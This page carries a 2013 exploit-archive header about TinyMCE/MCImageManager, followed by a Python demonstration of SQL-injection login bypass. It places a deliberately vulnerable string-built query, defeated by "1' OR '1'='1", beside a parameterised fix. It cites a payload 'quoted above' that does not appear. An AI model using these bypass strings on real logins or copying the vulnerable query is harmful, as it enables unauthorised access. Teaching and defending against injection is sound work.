# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
####

# F88A739D05F6206B   1337day.com [2013-11-04]   5B04A50E2B56698D #
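The plugin's login source is not on this page, so the following is an added illustration written for it, not TinyMCE/MCImageManager code: the class of login check that the `1' OR '1'='1` payload quoted above defeats, beside the parameterised version that does not. The table, user and stored password are constructed, and the plaintext password column is itself wrong (hash passwords) and is only there to keep the example short.

```python
import sqlite3

# Added illustration, not TinyMCE/MCImageManager code: a string-built login query
# of the kind the "1' OR '1'='1" payload above bypasses, and the parameterised fix.


def make_db():
    """Constructed in-memory users table with one (deliberately plaintext) credential."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db


def injected_statement(username, password):
    """The statement the vulnerable check actually sends, for review or logging."""
    return "SELECT 1 FROM users WHERE username = '%s' AND password = '%s'" % (username, password)


def login_vulnerable(db, username, password):
    """User input is pasted into the SQL text: a quote ends the literal and the rest is SQL.
    Returns True when any row matches, which is what an OR '1'='1' tail guarantees."""
    try:
        return db.execute(injected_statement(username, password)).fetchone() is not None
    except sqlite3.Error:
        return False          # malformed injection: an error, not a bypass (but still the same bug)


def login_parameterised(db, username, password):
    """Placeholders send the values separately from the statement; a quote in the input stays data."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"
    print(injected_statement(payload, payload))
    print("vulnerable   :", login_vulnerable(db, payload, payload))      # True
    print("parameterised:", login_parameterised(db, payload, payload))   # False
```

With this quoting the page's other payload, `'1'OR'1'`, produces a syntax error rather than a bypass, so which string works depends entirely on how the target assembles its statement; that is why the advisory offers two variants. The parameterised check is indifferent to both.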



Source: http://1337day.com/exploit/21454



